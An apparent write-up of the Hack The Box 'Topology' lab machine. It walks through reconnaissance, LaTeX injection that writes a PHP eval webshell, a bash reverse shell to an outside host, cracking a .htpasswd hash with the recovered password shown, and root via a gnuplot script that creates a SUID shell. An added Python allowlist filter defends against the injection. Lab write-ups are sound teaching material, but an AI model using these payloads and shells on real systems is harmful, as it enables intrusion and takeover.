Nmap

┌──(root💀kali)-[~]
└─# nmap -A 10.10.11.217                                                      
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-11 22:39 EDT
Verbosity Increased to 1.
Stats: 0:01:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 93.75% done; ETC: 22:40 (0:00:00 remaining)
Verbosity Increased to 2.
Completed NSE at 22:40, 7.32s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 0.00s elapsed
Nmap scan report for localhost (10.10.11.217)
Host is up (0.18s latency).
Scanned at 2023-06-11 22:39:04 EDT for 73s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 dcbc3286e8e8457810bc2b5dbf0f55c6 (RSA)
|   256 d9f339692c6c27f1a92d506ca79f1c33 (ECDSA)
|_  256 4ca65075d0934f9c4a1b890a7a2708d7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Miskatonic University | Topology Group
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

The classic ports 22 and 80.


Add the entry to /etc/hosts


Another subdomain is revealed on the web page


vhost brute-forcing

┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/topology]
└─# gobuster vhost -u http://topology.htb --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100    

The brute force turned up the domain dev.topology.htb here.

latex.topology.htb


The application on this domain generates a PDF file from a LaTeX expression.

For example, entering \frac{x+5}{y-3}


produces the corresponding PDF image. At first I was baffled and had no idea what to do; after searching around I came across

Refer-HackTrick:https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection
Refer-github:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
LaTeX expression injection exists.

Try the simplest file inclusion first


Found that it is banned.

Prodded GPT for LaTeX syntax


Found:

\begin{filecontents}{myfile.txt}
Hello, World!
\end{filecontents}

This syntax can write a file, and the site is written in PHP, so try writing a webshell

\begin{filecontents}{someb0dy.php}
<?php @eval($_POST['cmd']); ?>
\end{filecontents}

URL-encoded

%5Cbegin%7Bfilecontents%7D%7Bsomeb0dy.php%7D%0A%3C%3Fphp%20%40eval%28%24_POST%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%5Cend%7Bfilecontents%7D

But it did not seem to be written successfully; I tried for ages and could not get it written -_-, so kept prodding


Modified webshell

\begin{filecontents*}{someb0dy1.php}
<?php @eval($_POST['cmd']); ?>
\end{filecontents*}

URL-encoded

%5Cbegin%7Bfilecontents%2A%7D%7Bsomeb0dy1.php%7D%0A%3C%3Fphp%20%40eval%28%24_POST%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%5Cend%7Bfilecontents%2A%7D

Finally it went in! Spent a whole day on this webshell - - unreal!!! Sneaky.
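Defender's note on the two filter attempts above, as an added example that is not from the writeup: a substring denylist that names \input and \begin{filecontents} exactly lets the starred filecontents* environment through (and never sees a URL-encoded payload until it is decoded), while an allowlist of math-only control sequences, checked on the decoded input, rejects any environment or primitive it does not know. The macro and environment sets are assumptions for a formula-only renderer.

```python
import re
from urllib.parse import quote, unquote

# Assumed allowlist for a renderer that only typesets formulas.
ALLOWED_MACROS = {
    "frac", "sqrt", "sum", "int", "prod", "lim", "infty", "alpha", "beta",
    "gamma", "pi", "theta", "cdot", "times", "left", "right", "ldots",
    "begin", "end",
}
ALLOWED_ENVS = {"matrix", "pmatrix", "bmatrix", "cases", "aligned"}
ESCAPED_SPECIALS = set("\\{}_^%&$#,")

CONTROL_SEQ = re.compile(r"\\([A-Za-z]+\*?|[^A-Za-z])")
ENV_NAME = re.compile(r"\\(?:begin|end)\s*\{\s*([^}]*?)\s*\}")

# Constructed inputs: a benign formula, the unstarred and starred file-writing
# environments (inert body, no PHP), and the starred one URL-encoded as the
# browser would send it.
BENIGN = r"\frac{x+5}{y-3}"
UNSTARRED = "\\begin{filecontents}{t.txt}\nx\n\\end{filecontents}"
STARRED = "\\begin{filecontents*}{t.txt}\nx\n\\end{filecontents*}"
ENCODED = quote(STARRED, safe="")


def naive_filter_allows(expr: str) -> bool:
    """Exact-substring denylist of the kind the target appears to use."""
    deny = (r"\input", r"\include", r"\begin{filecontents}")
    return not any(bad in expr for bad in deny)


def hardened_filter_allows(expr: str) -> bool:
    """Allowlist check on the decoded expression; unknown macros/envs fail."""
    decoded = unquote(expr)  # the app decodes the query string before typesetting
    for m in CONTROL_SEQ.finditer(decoded):
        name = m.group(1)
        if name in ESCAPED_SPECIALS:
            continue  # \{ \} \\ etc. are harmless escaped characters
        if name not in ALLOWED_MACROS:
            return False  # \input, \write, \openout, \def ... all land here
    for m in ENV_NAME.finditer(decoded):
        if m.group(1) not in ALLOWED_ENVS:
            return False  # filecontents and filecontents* both rejected
    return True
```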


Reverse shell

bash -i >& /dev/tcp/10.10.16.8/4444 0>&1

Got a shell with www-data user privileges

/var/www/dev/.htpasswd
This looks like a password file


vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0
Try cracking it

username password
vdaisley calculus20

dev.topology.htb


Tried SSH and logged in successfully

Root


You can see find /opt/gnuplot -name *.plt -exec gnuplot {}
This command searches the /opt/gnuplot directory for *.plt files
and then runs each one as an argument to gnuplot
Refer:http://www.gnuplot.info/docs_4.2/node327.html


system "command" executes a shell command this way

-bash-5.0$ echo "system 'cp /bin/bash /tmp/someb0dy;chmod u+s /tmp/someb0dy'">someb0dy.plt
-bash-5.0$ cp someb0dy.plt /opt/gnuplot/someb0dy.plt
-bash-5.0$ ./someb0dy  -p
someb0dy-5.0# whaomi
root